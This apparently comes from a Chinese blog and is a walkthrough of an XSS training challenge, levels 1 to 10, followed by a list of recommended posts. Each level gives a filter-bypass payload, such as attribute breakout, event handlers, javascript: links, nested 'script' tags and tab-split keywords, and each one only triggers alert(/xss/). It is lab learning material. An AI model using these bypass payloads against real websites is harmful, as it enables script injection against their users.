XSS闯关挑战1-10

1

观察页面,发现页面没什么可利用的漏洞

但是url是?传参的类型,可以试试有没有xss漏洞

复制代码
<script>alert(/xss/)</script>

2

输入1的脚本发现没效果,看一下源代码,发现传入到value后是变成了字符串的形式,咱们就让他不是字符串

复制代码
<input name=keyword  value="  "><script>alert(/xss/)</script>"  ">

3

可以看到尖括号被过滤了

我们可以试试其他的可以弹出提示框的事件

复制代码
'  onclick='alert(/xss/)

还有以下常用事件

复制代码
mouseup  鼠标释放时触发
mousedown  鼠标按下时触发
mousemove   鼠标移动时触发
mouseout     鼠标离开时触发

4

过滤掉尖括号,以及用字符串

复制代码
"  onclick="alert(/xss/)

5

发现他过滤了事件,且大写也不行

我们可以用链接

复制代码
"> <a href = 'javascript:alert(/xss/)'>click me</a>"

6

用大写

复制代码
"> <a HREF = 'javascript:alert(/xss/)'>click me</a>"

7

过滤掉了href和script

复制代码
"><scrscriptipt>alert(/xss/)</scrscriptipt>"

8

想办法绕过

这里用制表符将script隔开

复制代码
javascr%09ipt:alert(/xss/)

9

提示连接不合法

在输入中输入url

复制代码
javascr%09ipt:alert('http://www.qq.com')

10

有三个input,试着传参

只有t_sort可以传参

发现输入事件无响应

试着加个按钮,成功了

复制代码
t_sort=dd" type="button" onclick="alert(/xss/)
相关推荐
float_六七3 分钟前
SQL预编译:安全高效数据库操作的关键
数据库·sql·安全
Fanmeang13 分钟前
OSPF与BGP的联动特性实验案例
运维·网络·华为·ospf·bgp·路由黑洞·ospf联动bgp
哈哈浩丶33 分钟前
Linux驱动开发2:字符设备驱动
linux·运维·驱动开发
啊森要自信34 分钟前
【Linux 学习指南】网络基础概念(一):从协议到分层,看透计算机通信的底层逻辑
linux·运维·服务器·网络·网络协议·tcp/ip·ip
asdfg125896334 分钟前
策略路由Policy-Based Routing(PBR)
linux·网络·wireshark·网络工程·策略路由
李少兄1 小时前
Git Commit Message写错后如何修改?已Push的提交如何安全修复?
git·安全
铃木隼.1 小时前
docker容器高级管理-dockerfile创建镜像
运维·docker·容器
Ronin3052 小时前
【Linux系统】进程状态 | 进程优先级
linux·运维·服务器·ubuntu
易知嵌入式小菜鸡2 小时前
CCS-MSPM0G3507-7-模块篇-MPU6050的基本使用
linux·运维·服务器
彬彬醤2 小时前
ChatGPT无法登陆?分步排查指南与解决方案
服务器·网络·数据库·网络协议·chatgpt